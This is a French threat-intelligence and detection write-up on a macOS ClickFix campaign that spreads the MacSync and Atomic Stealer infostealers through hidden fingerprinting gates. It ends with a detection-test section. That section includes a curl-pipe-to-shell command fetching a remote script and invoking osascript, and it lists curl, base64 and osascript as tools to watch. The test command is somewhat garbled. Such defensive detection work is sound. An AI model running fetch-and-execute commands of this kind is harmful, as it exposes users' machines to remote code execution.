SOC Prime Bias: Élevé

10 Aug 2026 16:48 UTC

La campagne macOS ClickFix évolue avec des portes d’infection masquées

Author Photo
SOC Prime Team linkedin icon Suivre
La campagne macOS ClickFix évolue avec des portes d’infection masquées
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une campagne ClickFix sur macOS distribue des voleurs d’informations incluant MacSync et Atomic Stealer (AMOS) à travers une porte de fingerprinting côté serveur sophistiquée. L’opération utilise des domaines générés par algorithme et du fingerprinting de navigateur pour s’assurer que les charges utiles malveillantes ne sont livrées qu’aux véritables utilisateurs de macOS, aidant ainsi à échapper à l’analyse de sécurité automatisée et aux robots d’exploration. Cette évolution marque un passage d’une ingénierie sociale large à des techniques de livraison hautement ciblées et dissimulées.

Enquête

Microsoft Threat Intelligence a suivi un cluster de plus de 250 domaines partageant un schéma de nommage distinct pour découvrir la campagne. L’enquête a révélé une transition d’une livraison d’appâts directe vers un processus en deux étapes impliquant un profilage JavaScript léger. En évaluant les signaux WebGL, les décalages horaires et les vérifications anti-analyse, les chercheurs ont déterminé comment l’infrastructure cible sélectivement les environnements macOS tout en présentant un contenu leurre bénin aux requêtes non qualifiées.

Atténuation

Les organisations devraient éduquer les utilisateurs sur le fait que les mises à jour logicielles légitimes ne nécessitent pas de coller des commandes dans le Terminal. Les équipes de sécurité devraient surveiller les activités suspectes du Terminal impliquant des utilitaires tels que curl, base64, gunzip, ou osascript, notamment lorsqu’ils sont déclenchés après la navigation sur le Web. Renforcer les protections autour des données Keychain et surveiller l’archivage non autorisé de fichiers sensibles peut également réduire l’impact d’un compromis réussi.

Réponse

Si une exécution suspecte dans le Terminal ou un accès non autorisé aux magasins de mots de passe est détecté, les intervenants devraient isoler immédiatement le point de terminaison macOS affecté. Examinez les connexions sortantes vers des domaines à faible réputation, en accordant une attention particulière à /curl/ les modèles de requête. Les hôtes de mise en scène malveillants identifiés doivent être bloqués, et l’historique récent du shell doit être examiné pour l’exécution de commandes encodées ou obfusquées.

Flux d’Attaque

Exécution de la simulation

Prérequis : La vérification pré-vol des télémesures et des bases doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Narratif de l’attaque & Commandes : L’adversaire initie une campagne ClickFix en présentant un message d’erreur faux dans un navigateur Web, incitant l’utilisateur à « Corriger l’erreur » en collant une commande spécifique dans le Terminal. L’objectif de l’attaquant est d’établir une persistance ou de télécharger des logiciels malveillants. La commande utilise curl pour récupérer une charge utile AppleScript malveillante d’un serveur distant et la pipe dans osascript -e pour l’exécuter immédiatement en mémoire, contournant ainsi les analyses traditionnelles basées sur les fichiers.

  • Script de test de régression :

    # Simulation de ClickFix : Récupération d'une charge utile et exécution via osascript
    # Remarque: Nous utilisons une commande d'écho inoffensive pour simuler la charge utile distante afin d'éviter toute infection réelle.
    
    curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerte de Sécurité : Mise à Jour du Système Requise""'
    
    # Pour s'assurer que la règle de détection se déclenche, nous exécutons le modèle exact :
    osascript -e 'say "Ceci est une attaque simulée"'
  • Commandes de nettoyage :

    # Aucun fichier n'est écrit sur le disque dans cette exécution de ligne de commande spécifique,
    # mais nous nous assurons de tuer tout processus en arrière-plan.
    killall osascript || true